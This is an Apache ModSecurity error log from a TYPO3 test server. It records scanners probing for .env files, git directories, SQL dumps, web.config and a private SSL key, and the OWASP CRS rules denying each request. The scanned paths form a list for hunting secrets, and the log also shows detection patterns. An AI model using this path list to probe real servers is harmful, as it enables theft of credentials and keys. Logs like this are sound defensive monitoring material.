[Tue Mar 25 06:20:25.877633 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPVQAAAAE"]
[Tue Mar 25 06:20:25.900937 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Tue Mar 25 06:20:26.754112 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPWwAAAAE"]
[Tue Mar 25 06:20:26.754397 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPWwAAAAE"]
[Tue Mar 25 06:20:26.754569 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPWwAAAAE"]
[Tue Mar 25 06:20:26.775678 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXAAAAAE"]
[Tue Mar 25 06:20:26.775905 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXAAAAAE"]
[Tue Mar 25 06:20:26.776087 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXAAAAAE"]
[Tue Mar 25 06:20:26.812068 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXQAAAAE"]
[Tue Mar 25 06:20:26.812311 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXQAAAAE"]
[Tue Mar 25 06:20:26.812494 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-I9GlZ2Q2QNAyAImxZPXQAAAAE"]
[Tue Mar 25 06:20:26.833033 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue Mar 25 06:20:26.868187 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue Mar 25 06:20:27.024084 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Mar 25 06:20:27.045081 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPYwAAAAE"]
[Tue Mar 25 06:20:27.045246 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPYwAAAAE"]
[Tue Mar 25 06:20:27.045480 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPYwAAAAE"]
[Tue Mar 25 06:20:27.045664 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPYwAAAAE"]
[Tue Mar 25 06:20:27.066036 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Tue Mar 25 06:20:27.203185 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/CHANGELOG.txt
[Tue Mar 25 06:20:27.224337 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPaQAAAAE"]
[Tue Mar 25 06:20:27.224582 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPaQAAAAE"]
[Tue Mar 25 06:20:27.224776 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPaQAAAAE"]
[Tue Mar 25 06:20:27.291615 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue Mar 25 06:20:27.312541 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue Mar 25 06:20:27.333156 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.wp-config.php.swp
[Tue Mar 25 06:20:27.394488 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Tue Mar 25 06:20:27.504423 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php~
[Tue Mar 25 06:20:27.565645 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdAAAAAE"]
[Tue Mar 25 06:20:27.565895 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdAAAAAE"]
[Tue Mar 25 06:20:27.566084 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdAAAAAE"]
[Tue Mar 25 06:20:27.589021 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdQAAAAE"]
[Tue Mar 25 06:20:27.589260 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdQAAAAE"]
[Tue Mar 25 06:20:27.589431 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-I9G1Z2Q2QNAyAImxZPdQAAAAE"]
[Tue Mar 25 06:20:28.562461 2025] [:error] [pid 2005449] [client 170.39.218.176:60800] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-I9HN1Jq2ho7VevEGi5cQAAAAM"]
[Tue Mar 25 06:20:28.562706 2025] [:error] [pid 2005449] [client 170.39.218.176:60800] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-I9HN1Jq2ho7VevEGi5cQAAAAM"]
[Tue Mar 25 06:20:28.562933 2025] [:error] [pid 2005449] [client 170.39.218.176:60800] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-I9HN1Jq2ho7VevEGi5cQAAAAM"]
[Tue Mar 25 06:20:28.608057 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:28.935770 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:28.957100 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:28.993968 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:29.021448 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:29.377504 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Tue Mar 25 06:20:29.448730 2025] [authz_core:error] [pid 2005449] [client 170.39.218.176:60800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Tue Mar 25 11:14:08.933344 2025] [authz_core:error] [pid 2012181] [client 213.232.87.232:50847] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Tue Mar 25 11:14:08.937467 2025] [:error] [pid 2005480] [client 213.232.87.232:2187] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z-KB8KbLrEDB--r3L3AZ1AAAAAU"]
[Tue Mar 25 11:14:08.937738 2025] [:error] [pid 2005480] [client 213.232.87.232:2187] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z-KB8KbLrEDB--r3L3AZ1AAAAAU"]
[Tue Mar 25 11:14:08.937930 2025] [:error] [pid 2005480] [client 213.232.87.232:2187] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z-KB8KbLrEDB--r3L3AZ1AAAAAU"]
[Tue Mar 25 11:14:08.939350 2025] [:error] [pid 2012182] [client 213.232.87.232:10833] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-KB8L1zBWAuMmCVJ0sL5AAAAAg"]
[Tue Mar 25 11:14:08.939510 2025] [:error] [pid 2012182] [client 213.232.87.232:10833] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-KB8L1zBWAuMmCVJ0sL5AAAAAg"]
[Tue Mar 25 11:14:08.939668 2025] [:error] [pid 2012182] [client 213.232.87.232:10833] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-KB8L1zBWAuMmCVJ0sL5AAAAAg"]
[Tue Mar 25 11:14:09.060273 2025] [authz_core:error] [pid 2005897] [client 213.232.87.232:48875] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Tue Mar 25 11:14:09.060648 2025] [:error] [pid 2012183] [client 213.232.87.232:41751] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-KB8eIESaL0ZyUOjboXYwAAAAk"]
[Tue Mar 25 11:14:09.060870 2025] [:error] [pid 2012183] [client 213.232.87.232:41751] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-KB8eIESaL0ZyUOjboXYwAAAAk"]
